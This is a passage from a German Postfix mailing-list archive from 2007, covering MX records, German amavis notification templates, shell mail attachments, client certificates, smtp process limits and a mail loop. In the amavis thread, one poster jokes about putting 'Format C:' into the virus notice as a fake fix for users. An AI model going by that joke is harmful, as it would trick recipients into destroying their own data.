: Relay access denied; from=<> > to= proto=SMTP helo= > --schnipp-- Dies sieht mir eher nach einer Fehlkonfiguration aus, wenn für die Domain kein User angelegt ist, dann sollte eher eine Meldung kommen wie MC3 postfix/smtpd[4922]: NOQUEUE: reject: RCPT from XXX[XX.XXX.XXX.XXX]: 550 5.1.1 : Recipient address rejected: User unknown in virtual alias table; from= to= proto=ESMTP helo= > Postfix lehnt ja die Mails korrekt ab, somit eigentlich kein Problem. > > Da nun das Spamaufkommen immer mehr zunimmt, wollte ich fragen, was dagegen > spricht, wenn ich den MX-Eintrag dieser Domaine entferne. Wie würdet Ihr > mit einem solchen > Fall umgehen? ich würde in keinem Fall den mx-Eintrag entfernen ohne den Kunden hierüber zu informieren. Sonst wundert er sich in einingen Wochen, dass bei Ihm die neu eingerichten eMailaccounts nicht gehen. Gruß Oliver -- Methfessel Computers Zieglerstr. 25a, 65191 Wiesbaden Geschäftsführender Inhaber: Oliver Methfessel http://www.methfessel-computers.de contact at methfessel-computers.de Tel: +49(0)611 5328735 Fax: +49(0)611 5328512 Support per: IRC-Chat: #MC @ irc.whf-chat.de Ticket: https://intern.methfessel-computers.de Forum: http://forum.methfessel-computers.de Telefon: 0900-5805470-760 (0,99 EUR / Minute) From rolf.mannhart at casanova.ch Mon Nov 5 09:29:37 2007 From: rolf.mannhart at casanova.ch (Rolf Mannhart - Casanova Digital) Date: Mon, 05 Nov 2007 09:29:37 +0100 Subject: [Postfixbuch-users] Webseite ohne Mailkonten In-Reply-To: <20071105080357.GC29014@charite.de> References: <472ECD54.1030606@casanova.ch> <20071105080357.GC29014@charite.de> Message-ID: <472ED471.4050105@casanova.ch> Ralf Hildebrandt schrieb: >> Ich habe einen Kunden, welcher seine Webseite bei uns hosten lässt. Er >> ist einer >> der wenigen, welche keine Mailkonten besitzt. >> > Wozu hat er dann einen MX record? > Wir haben im DNS ein (Standard)-File erstellt, welches für die meisten Kunden korrekt ist. dns-einträge, mx-eintrag, www-eintrag, webmail, etc. >> Postfix lehnt ja die Mails korrekt ab, somit eigentlich kein Problem. >> > Genau. > >> Da nun das Spamaufkommen immer mehr zunimmt, wollte ich fragen, was dagegen >> spricht, wenn ich den MX-Eintrag dieser Domaine entferne. Wie würdet Ihr >> mit einem solchen >> Fall umgehen? >> > Welches Spamaufkommen? Die Mail wird doch gar nicht angenommen. Sorry, Spamaufkommen war ein völlig falsches Wort. Ich wollte eigentlich blos sagen, dass dies in meinen Augen "Last" ist, welcher der Server nicht unbedingt braucht. Und was nicht gebraucht wird, soll man doch gleich draussen lassen. @Oliver: Nein, das ist keine Fehlkonfiguration. Da die Domain schon nicht gültig ist, wird ein Relay Access Denied ausgegeben. Ein User unknown wird ausgespuckt, wenn es wohl eine Domain mit diesem Namen gibt, aber keinen zugehörigen Benutzer. Hoffe habe das so richtig verstanden. Ich habe nun den MX-Einträg für diese Domain entfernt, dem Kunden auf sein GMX-Konte eine Mail mit der Information geschickt. Warscheinlich will er nun dann plötzlich ein Mailkonto ;-) From Ralf.Hildebrandt at charite.de Mon Nov 5 09:39:10 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 5 Nov 2007 09:39:10 +0100 Subject: [Postfixbuch-users] Webseite ohne Mailkonten In-Reply-To: <472ED471.4050105@casanova.ch> References: <472ECD54.1030606@casanova.ch> <20071105080357.GC29014@charite.de> <472ED471.4050105@casanova.ch> Message-ID: <20071105083910.GF29014@charite.de> * Rolf Mannhart - Casanova Digital : > Wir haben im DNS ein (Standard)-File erstellt, welches für die meisten > Kunden korrekt ist. dns-einträge, mx-eintrag, www-eintrag, webmail, > etc. Achso. > Sorry, Spamaufkommen war ein völlig falsches Wort. Ich wollte > eigentlich blos sagen, dass dies in meinen Augen "Last" ist, welcher > der Server nicht unbedingt braucht. Nun, wenn man den MX löscht, dann geht's alles auf den A Record (sofern dafür einer existiert). -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de There is no Darkness in Eternity, only Light too dim for us to see (Unless you're working with NT) From sven at root2.schroederhost.de Mon Nov 5 12:09:27 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Mon, 05 Nov 2007 12:09:27 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch Message-ID: <472EF9E7.504@root2.schroederhost.de> Hi NG! Wie bekommt man die Viruswarnungen etc von Amavis auf Deutsch? From p.heinlein at heinlein-support.de Mon Nov 5 12:19:34 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Mon, 5 Nov 2007 12:19:34 +0100 Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> <200711042248.52340.p.heinlein@heinlein-support.de> <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> Message-ID: <200711051219.34595.p.heinlein@heinlein-support.de> Am Sonntag, 4. November 2007 23:24 schrieb stefan at webetc.de: > > [Nur am Rande: Müßtest Du nicht: > > http://www.postfix.org/ADDRESS_VERIFICATION_README.html > > *vordiestirnklatsch*... ist schon ein paar Tage her, dass ich Sender > address verification gemacht habe. Daher hätte ich es noch wissen > müssen. Du meinst RECIPIENT address verification. > Ich meinte Emails, die von amavisd-new überprüft wurden, müssen ja > wieder dem Postfix Zustellprozess zurückgeführt werden. Am Machtz amavis. Trage als forwartd_method nicht 127.0.0.1:10024 ein, sondern *:*. Dann connected amavis automatisch zu der IP, von der aus die Verbindung kam und nimmt als Port den eigenen Empfangsport, +1. Sprich: Das geht dann zurück an Postfix, Port 10025. Beispiele dazu in http://www.heinlein-support.de/upload/mk3/SpamAssassin-Geheimnisse.pdf > Wenn ja, komme ich irgendwie drumherum, diese transport map zu > pflegen? Auf dem Amavis-Rechner gar nicht erst Postfix ins Spiel bringen. :-) Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030 / 40 50 51 - 0 *** Fax: - 19 Die 2. Secure Linux Administration Conference am 6./7.12.2007 http://www.heinlein-support.de/slac Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From p.heinlein at heinlein-support.de Mon Nov 5 12:20:15 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Mon, 5 Nov 2007 12:20:15 +0100 Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <61003.85.180.195.178.1194215784.squirrel@85.180.195.178> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> <61003.85.180.195.178.1194215784.squirrel@85.180.195.178> Message-ID: <200711051220.15860.p.heinlein@heinlein-support.de> Am Sonntag, 4. November 2007 23:36 schrieb stefan at webetc.de: > Ich will meine Mail mal selbst beantworten: > > Zitat aus > www.heinlein-support.de/upload/mk3/SpamAssassin-Geheimnisse.pdf : > "amavis weiß über $forward_method, wohin die Mail zurückgeht" > > Wenn dem so ist, sind meine Fragen beantwortet ;o) Äh, okay. Dann ignorier die andere Mail, die ich gerade schrieb... Mit freundlichen Grüßen Peer Heinlein -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Tel: 030 / 40 50 51 - 0 *** Fax: - 19 Die 2. Secure Linux Administration Conference am 6./7.12.2007 http://www.heinlein-support.de/slac Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From s.neukirchner at konabi.de Mon Nov 5 13:01:07 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Mon, 5 Nov 2007 13:01:07 +0100 Subject: [Postfixbuch-users] mails von der Bash Shell mit Anhang versenden Message-ID: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> Hallo, Mit echo "testmail" | /bin/mail -s 'nur ein Test' adresse at domain kann ich eine Mail auf der Shell senden. Wie kann ich nun eine Mail mit einer PDF Datei als Anhang von der Bash Shell senden? Ich dächte ich hatte das schon mal mit der Option -a realisiert. Funktioniert aber nicht mehr. Ich verwende Debian 4.0 und Postfix als Mailserver. Danke Sven From Ralf.Hildebrandt at charite.de Mon Nov 5 13:23:31 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 5 Nov 2007 13:23:31 +0100 Subject: [Postfixbuch-users] mails von der Bash Shell mit Anhang versenden In-Reply-To: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> References: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> Message-ID: <20071105122330.GY29014@charite.de> * Sven Neukirchner : > Hallo, > > Mit > > echo "testmail" | /bin/mail -s 'nur ein Test' adresse at domain > > kann ich eine Mail auf der Shell senden. > > Wie kann ich nun eine Mail mit einer PDF Datei als Anhang von der Bash Shell > senden? mpack -s 'nur ein Test' PDF adresse at domain -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Windows NT crashed. I am the Blue Screen of Death. No one hears your screams. From usenet at deiszner.de Mon Nov 5 13:27:09 2007 From: usenet at deiszner.de (Sebastian Deiszner) Date: Mon, 05 Nov 2007 13:27:09 +0100 Subject: [Postfixbuch-users] mails von der Bash Shell mit Anhang versenden In-Reply-To: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> References: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> Message-ID: <472F0C1D.2070204@deiszner.de> Sven Neukirchner schrieb: > Hallo, > > Mit > > echo "testmail" | /bin/mail -s 'nur ein Test' adresse at domain > > kann ich eine Mail auf der Shell senden. > > Wie kann ich nun eine Mail mit einer PDF Datei als Anhang von der Bash Shell > senden? > > Ich dächte ich hatte das schon mal mit der Option -a realisiert. > Funktioniert aber nicht mehr. Ich verwende Debian 4.0 und Postfix als > Mailserver. > > Danke > Sven > > echo "Mailtext" | mutt -s "hier kommt der betreff der mail rein " -a /hier/ist/die/datei/welche/du/versenden/willst ich at du.meine.domain.er From joe at pdi-berlin.de Mon Nov 5 13:09:46 2007 From: joe at pdi-berlin.de (Joachim Schoenberg) Date: Mon, 5 Nov 2007 13:09:46 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472EF9E7.504@root2.schroederhost.de> References: <472EF9E7.504@root2.schroederhost.de> Message-ID: <200711051309.46772.joe@pdi-berlin.de> Am Montag, 5. November 2007 schrieb Sven Schmidt: > Hi NG! > > Wie bekommt man die Viruswarnungen etc von Amavis auf Deutsch? Zu Deiner Amavis-Installation sollte eine Datei README.customize gehören, da ist das erklärt. Kurzfassung: Die Templates sind Teil des Amavisd-Skriptes. Diese sind herauszukopieren, zu editieren und unter entsprechendem Namen in (z. B.) /var/spool/amavis abzulegen. Dann mußt Du noch in /etc/amavisd.conf die neuen Meldungen aktivieren, z. B.: $notify_virus_recips_templ= read_text("$MYHOME/notify_virus_recips.txt"); (Anleitung gilt unter Debian u. U. nur modifiziert) Joe -- ----------------------------------- Joachim Schoenberg Paul-Drude-Institut for Solid State Electronics, Berlin ----------------------------------- From nospam at thoma.cc Mon Nov 5 13:29:46 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Mon, 05 Nov 2007 13:29:46 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472EF9E7.504@root2.schroederhost.de> References: <472EF9E7.504@root2.schroederhost.de> Message-ID: <472F0CBA.3070503@thoma.cc> Sven Schmidt schrieb: > Hi NG! > > Wie bekommt man die Viruswarnungen etc von Amavis auf Deutsch? Der Uwe hatte die mal auf Deutsch. http://funk.fblan.de/postfix/amavis/ Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From sven at root2.schroederhost.de Mon Nov 5 13:37:39 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Mon, 05 Nov 2007 13:37:39 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472F0CBA.3070503@thoma.cc> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc> Message-ID: <472F0E93.3090504@root2.schroederhost.de> Maximilian Thoma schrieb: > Der Uwe hatte die mal auf Deutsch. > > http://funk.fblan.de/postfix/amavis/ > > Gruß > > Sieht gut aus, mal testen... From driessen at fblan.de Mon Nov 5 13:41:06 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 5 Nov 2007 13:41:06 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472F0CBA.3070503@thoma.cc> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc> Message-ID: <000301c81fa9$22d4e1d0$0565a8c0@uwe> Maximilian Thoma schrieb: > Sven Schmidt schrieb: > > Hi NG! > > > > Wie bekommt man die Viruswarnungen etc von Amavis auf Deutsch? > > Der Uwe hatte die mal auf Deutsch. > > http://funk.fblan.de/postfix/amavis/ Die Seite ist von der Subdomain zur Hauptdomain gewandert nehmt bitte http://www.fblan.de/postfix/amavis das funk wird demnächst abgeschaltet > > Gruß > > > Maximilian Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From rainer.frey at inxmail.de Mon Nov 5 14:35:06 2007 From: rainer.frey at inxmail.de (Rainer Frey) Date: Mon, 5 Nov 2007 14:35:06 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472CC915.3020708@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> Message-ID: <200711051435.06929.rainer.frey@inxmail.de> On Tuesday 30 October 2007 19:37:06 Marco Estrada Martinez wrote: > Hi @ all, > > Ich habe, wie man sehen kann ;o), postfix mit Clientzertifikaten > eingerichtet. Was meinst du "Mit Client-Zertifikaten eingerichtet"? check_ccert_access verwendet, oder was? > Nun habe, vielleicht ein Grundlegendes Problem. > > Ich bin der Meinung wenn ich einer Person ein Clientzertifikat > aushändige ist dieses Zertifikat nicht Rechner gebunden, Oder ? Die Zertifikate an sich sind nicht rechnergebunden (es sei denn, man verwendet Rechnernamen als Komponente im DN, aber dann ist die Abhängigkeit bei *Client*-Zertifikaten nur logisch, nicht technisch). Was aber rechnergebunden sein kann, ist die Generierung des Private Key, die eine Übertragung auf einen Rechner nicht oder nur schwierig möglich machen könnte. > Das Problem ist. Ich habe auf meinem Lapi das Clientzertifikat > installiert, wenn ich nun das Zertifikat auch auf meiner Desktopmaschine > installieren will bekomme ich beim versenden von Mails die Meldung > (Thunderbird), dass das Zertifikate ungültig ist weil ein gleiches mit > der selben Seriennummer vorhanden ist. Wie hast du denn das Zertifikat auf die Desktopmaschine übertragen? Du hast aber nicht ein gleichlautendes Zertifikat mit neuem Schlüssel erstellt, oder? Ansonsten: wer bringt die Fehlermeldung, Thunderbird order Postfix? Wenn letzteres, was sagt das Log? Bei Thunderbird: gab es vielleicht schon mal ein Zertifikat mit dem selben DN im Thunderbird? IIRC muss man das erst löschen, bevor man ein neues importiert. > Was ja so richtig ist -> Laptop. > Nun bin ich aber der Meinung das es Blödsinn wäre für jeden Rechner, die > gleice Person, ein Clientzertifikat auszustellen, Oder? Da hast du recht. > THX @ all und einen schönen Abend. Marco Gruß Rainer Frey -- Inxmail GmbH www.inxmail.de Handelsregister Freiburg, HRB 5870 Ust.-ID: DE198371679 Geschäftsleitung Martin Bucher, Peter Ziras From sven at root2.schroederhost.de Mon Nov 5 14:36:28 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Mon, 05 Nov 2007 14:36:28 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <000301c81fa9$22d4e1d0$0565a8c0@uwe> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc> <000301c81fa9$22d4e1d0$0565a8c0@uwe> Message-ID: <472F1C5C.9050300@root2.schroederhost.de> Uwe Driessen schrieb: > Die Seite ist von der Subdomain zur Hauptdomain gewandert nehmt bitte > > http://www.fblan.de/postfix/amavis > > > das funk wird demnächst abgeschaltet hat geklappt: "Ein Virus (Eicar-Test-Signature) wurde gefunden. Benutzen Sie bitte kein Microsoft propritäres format. Senden Sie die Mail nochmal als reine Text-Mail! Scanner der einen Virus fand: ClamAV-clamd" Ich frag mich nur, was er mit dem Format zu nörgeln hat. From driessen at fblan.de Mon Nov 5 15:06:31 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 5 Nov 2007 15:06:31 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472F1C5C.9050300@root2.schroederhost.de> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc><000301c81fa9$22d4e1d0$0565a8c0@uwe> <472F1C5C.9050300@root2.schroederhost.de> Message-ID: <000801c81fb5$111cf070$0565a8c0@uwe> Sven Schmidt schrieb: > Uwe Driessen schrieb: > > Die Seite ist von der Subdomain zur Hauptdomain gewandert nehmt bitte > > > > http://www.fblan.de/postfix/amavis > > > > > > das funk wird demnächst abgeschaltet > hat geklappt: > > "Ein Virus (Eicar-Test-Signature) wurde gefunden. > Benutzen Sie bitte kein Microsoft propritäres format. Senden Sie die > Mail nochmal als reine Text-Mail! > Scanner der einen Virus fand: ClamAV-clamd" > > Ich frag mich nur, was er mit dem Format zu nörgeln hat. Das steht als Text einfach mal so drin (das Outlook RTF Format kann noch nicht mal Word selbst richtig lesen oder verarbeiten das geht in der Regel nur mit Outlook). Den Text kannst du aber ganz einfach ändern in den Files. Was du da in die Files reinschreibst bleibt dir selber überlassen da kann man sonst was reinschreiben (bei dem einen oder anderen würde ich gerne "mach mal Format C: zur Fehlerbereinigung" reinschreiben *gg Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From max.muxe at maxxly.de Mon Nov 5 14:34:38 2007 From: max.muxe at maxxly.de (Max Muxe) Date: Mon, 05 Nov 2007 14:34:38 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User Message-ID: <472F1BEE.7000500@server1.office> Hallo Leute, ich bin am Verzweifeln. Eine Mail mit To: undisclosed-recipients:; ohne Betreff und einer beliebigen Zahl zwischen 0 und 9 im Text wird ständig an die User ausgeliefert (100 pro Miniute). Ich weiss nicht wie ich reagieren soll. Ich war eine Woche nicht im Büro: bis dahin alles okay. Gestern dann nach dem Einschalten ging das los. Irgendwie habe ich keinen Plan und wenig Zeit. postsuper -r postsuper -s brachten nichts. Postfix reinstall : nix Danke From cite at incertum.net Mon Nov 5 15:51:53 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 5 Nov 2007 15:51:53 +0100 Subject: [Postfixbuch-users] Amavis Fehler auf Deutsch In-Reply-To: <472F1C5C.9050300@root2.schroederhost.de> References: <472EF9E7.504@root2.schroederhost.de> <472F0CBA.3070503@thoma.cc> <000301c81fa9$22d4e1d0$0565a8c0@uwe> <472F1C5C.9050300@root2.schroederhost.de> Message-ID: <20071105145152.GA17591@mail.incertum.net> * Sven Schmidt wrote: > "Ein Virus (Eicar-Test-Signature) wurde gefunden. > Benutzen Sie bitte kein Microsoft propritäres format. Senden Sie die > Mail nochmal als reine Text-Mail! > Scanner der einen Virus fand: ClamAV-clamd" Also, wenn das Kunden sind, die zahlen, wuerde ich diese Meldung (und auch die anderen) evt. nochmal Korrekturlesen :-P Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #157: eMail - I don't have an email address. I reached an age where my main purpose is not to receive messages. (Umberto Eco) From link001 at gmx.de Mon Nov 5 15:52:32 2007 From: link001 at gmx.de (Mathias Link) Date: Mon, 05 Nov 2007 15:52:32 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... Message-ID: <20071105145232.244500@gmx.net> Hallo, wir haben 1 Front Relay was die Eingänge an unseren internen Mailer weiterleitet. Ausgehende Mails werden direkt über das FrontRelay versandt. Wir haben eine 128K/Bit Standleitung nach außen, was sich leider nicht ändern lässt. Zwischen den Servern gibt es GigaBit LAN. Zum Problem: Zwischenzeitlich entsteht (neuerdings) die Situation, dass z.B. 350 Mails mit z.B. einem Anhang von 1 MB oder ähnlich verschickt werden müssen. Am Front Relay stand der smtp früher auf MaxProc 100. Das ist solange ok, bis größere Anhänge kommen. Es werden soviele Instanzen des smtp gestartet, das es durch die geringe Bandbreite zum Übertragungs TimeOut kommt. Dann haben wir den MaxProc smtp runtergesetzt (30) jetzt schiebt er immer eben fleißig die Mails raus, aber die Weiterleitung der eingehenden Mails (die ja auch über den smtp läuft) läuft natürlich auch langsamer, selbst wenn die Massenmailerei vorbei ist. Also schalten wir immer fleißig hin und her. Wir haben nach innen aber Gigabit Anbindung, ist doch schade drum, da der Flaschenhals der smtp Daemon ist (bedingt durch die 128K/Bit Leitung). Der smtpd hingegen nimmt fleißig weiter an (es kommt auch sehr viel rein). Das interne Interface ist unbeschäftigt und nur wegen dem smtp. Hat hierzu jemand eine Idee wie Postfix auf diese Auslastungen individuell reagieren könnte, um ständige manuelle Eingriffe zu verhindern. Oder gar einen anderen Vorschlag für die interne Zustellung? Mit freundlichen Grüßen Mathias Link -- Ist Ihr Browser Vista-kompatibel? Jetzt die neuesten Browser-Versionen downloaden: http://www.gmx.net/de/go/browser From mhaegele at linuxrocks.dyndns.org Mon Nov 5 16:02:22 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Mon, 05 Nov 2007 16:02:22 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <472F1BEE.7000500@server1.office> References: <472F1BEE.7000500@server1.office> Message-ID: <472F307E.5020009@linuxrocks.dyndns.org> Max Muxe schrieb: > Hallo Leute, > > ich bin am Verzweifeln. Eine Mail mit > > To: undisclosed-recipients:; > > ohne Betreff und einer beliebigen Zahl zwischen 0 und 9 im Text wird > ständig an die User ausgeliefert (100 pro Miniute). Ich weiss nicht wie > ich reagieren soll. Ich war eine Woche nicht im Büro: bis dahin alles > okay. Gestern dann nach dem Einschalten ging das los. Irgendwie habe ich > keinen Plan und wenig Zeit. > > postsuper -r > postsuper -s > brachten nichts. Zeig mal das Log? Und die Mail im Quelltext? postconf -n? Ein paar Infos mehr könnten nicht schaden. > Postfix reinstall : nix Ist ja auch nicht Windows ;-). > Danke -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From s.neukirchner at konabi.de Mon Nov 5 16:06:55 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Mon, 5 Nov 2007 16:06:55 +0100 Subject: [Postfixbuch-users] mails von der Bash Shell mitAnhang versenden In-Reply-To: <20071105122330.GY29014@charite.de> References: <010001c81fa3$8cfa3fc0$96ffa8c0@nicos.local> <20071105122330.GY29014@charite.de> Message-ID: <014d01c81fbd$815ffa50$96ffa8c0@nicos.local> Danke für die schnelle Antwort. Sven -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Ralf Hildebrandt Gesendet: Montag, 5. November 2007 13:24 An: postfixbuch-users at listi.jpberlin.de Betreff: Re: [Postfixbuch-users] mails von der Bash Shell mitAnhang versenden * Sven Neukirchner : > Hallo, > > Mit > > echo "testmail" | /bin/mail -s 'nur ein Test' adresse at domain > > kann ich eine Mail auf der Shell senden. > > Wie kann ich nun eine Mail mit einer PDF Datei als Anhang von der Bash Shell > senden? mpack -s 'nur ein Test' PDF adresse at domain -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Windows NT crashed. I am the Blue Screen of Death. No one hears your screams. -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From postfixbuch-users at japantest.homelinux.com Mon Nov 5 16:44:16 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 05 Nov 2007 16:44:16 +0100 Subject: [Postfixbuch-users] Der smtp als Flaschenhals... In-Reply-To: <20071105145232.244500@gmx.net> References: <20071105145232.244500@gmx.net> Message-ID: <472F3A50.2030606@japantest.homelinux.com> Mathias Link wrote: > Hallo, > > wir haben 1 Front Relay was die Eingänge an unseren internen Mailer > weiterleitet. Ausgehende Mails werden direkt über das FrontRelay > versandt. Wir haben eine 128K/Bit Standleitung nach außen, was sich > leider nicht ändern lässt. Zwischen den Servern gibt es GigaBit LAN. > > Zum Problem: Zwischenzeitlich entsteht (neuerdings) die Situation, dass > z.B. 350 Mails mit z.B. einem Anhang von 1 MB oder ähnlich verschickt > werden müssen. > > Am Front Relay stand der smtp früher auf MaxProc 100. Das ist solange > ok, bis größere Anhänge kommen. Es werden soviele Instanzen des smtp > gestartet, das es durch die geringe Bandbreite zum Übertragungs TimeOut > kommt. > > Dann haben wir den MaxProc smtp runtergesetzt (30) jetzt schiebt er > immer eben fleißig die Mails raus, aber die Weiterleitung der > eingehenden Mails (die ja auch über den smtp läuft) läuft natürlich > auch langsamer, selbst wenn die Massenmailerei vorbei ist. Also > schalten wir immer fleißig hin und her. Der Ausweg ist, Kopien vom Transport "smtp" anzulegen und diese zu verwenden. master.cf: smtp unix - - n - 30 smtp smtp-intern unix - - n - 200 smtp Verwende dann in den internen Weiterleitungen die Kopie smtp-intern. /etc/postfix/transport: server1.example.com smtp-intern:[192.168.1.2] -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From max.muxe at maxxly.de Mon Nov 5 16:49:48 2007 From: max.muxe at maxxly.de (max.muxe at maxxly.de) Date: Mon, 05 Nov 2007 16:49:48 +0100 Subject: [Postfixbuch-users] DINGENDE Hilfe: Mail pendelt zwischen zwei lokale User In-Reply-To: <472F307E.5020009@linuxrocks.dyndns.org> References: <472F1BEE.7000500@server1.office> <472F307E.5020009@linuxrocks.dyndns.org> Message-ID: <20071105164948.fpemww0rtwog08kg@www.hosting-agency.de> Zitat von Matthias Haegele : > Max Muxe schrieb: >> Hallo Leute, >> >> ich bin am Verzweifeln. Eine Mail mit >> >> To: undisclosed-recipients:; >> [...] > > Zeig mal das Log? > Und die Mail im Quelltext? > postconf -n? > > Ein paar Infos mehr könnten nicht schaden. > >> Postfix reinstall : nix > > Ist ja auch nicht Windows ;-). > Hallo Matthias, ich antworte jetzt mit einem Web-Mailer, deswegen eventuell etwas schräg: Eine der mittlerweile hunderte Mails in Quelle: Return-Path: X-Original-To: max.muxe at server1.office Delivered-To: max.muxe at server1.office Received: from localhost (localhost [127.0.0.1]) by server1 (Postfix) with ESMTP id 97A1E1BD9A for ; Mon, 5 Nov 2007 16:22:29 +0100 (CET) X-Spam-Score: 2.008 X-Spam-Level: ** X-Spam-Status: No, score=2.008 tagged_above=2 required=6.31 tests=[AWL=-0.464, BAYES_40=-0.185, MISSING_SUBJECT=1.816, UNDISC_RECIPS=0.841] Received: from server1 ([127.0.0.1]) by localhost (localhost [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id GjVTaLb3wz+d for ; Mon, 5 Nov 2007 16:22:29 +0100 (CET) Received: by server1 (Postfix, from userid 1002) id 55FFF1CC52; Mon, 5 Nov 2007 07:34:29 +0100 (CET) Delivered-To: unknown Received: from mail.hosting-agency.de (194.145.226.10) by localhost with IMAP4; 05 Nov 2007 06:34:29 -0000 Message-Id: <20071105065202.55FFF1CC52 at server1> Date: Mon, 5 Nov 2007 07:34:29 +0100 (CET) From: max at server1.office (Max Muxe) To: undisclosed-recipients:; 8 postconf: server1:/etc/postfix# postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix delay_warning_time = 4h home_mailbox = Maildir/ inet_interfaces = all inet_protocols = all mailbox_size_limit = 1048576000 maximal_queue_lifetime = 5d message_size_limit = 10485760 mydestination = server1, server1.office, localhost.office, localhost mydomain = office myhostname = server1 mynetworks = 192.168.121.0/24, 127.0.0.0/8 myorigin = /etc/mailname queue_minfree = 104857600 recipient_canonical_maps = hash:/etc/postfix/canonical_recipient recipient_delimiter = relayhost = mail.taurus.hosting-agency.de sender_canonical_maps = hash:/etc/postfix/canonical_sender smtp_enforce_tls = no smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash:/etc/postfix/smtp_sasl_passwd smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtp_use_tls = yes smtpd_banner = $myhostname ESMTP smtpd_client_restrictions = reject_invalid_hostname smtpd_helo_required = yes smtpd_helo_restrictions = reject_invalid_hostname smtpd_recipient_restrictions = permit_mynetworks, reject_unlisted_recipient, reject_unknown_recipient_domain, permit_sasl_authenticated, reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname smtpd_sasl_security_options = noanonymous 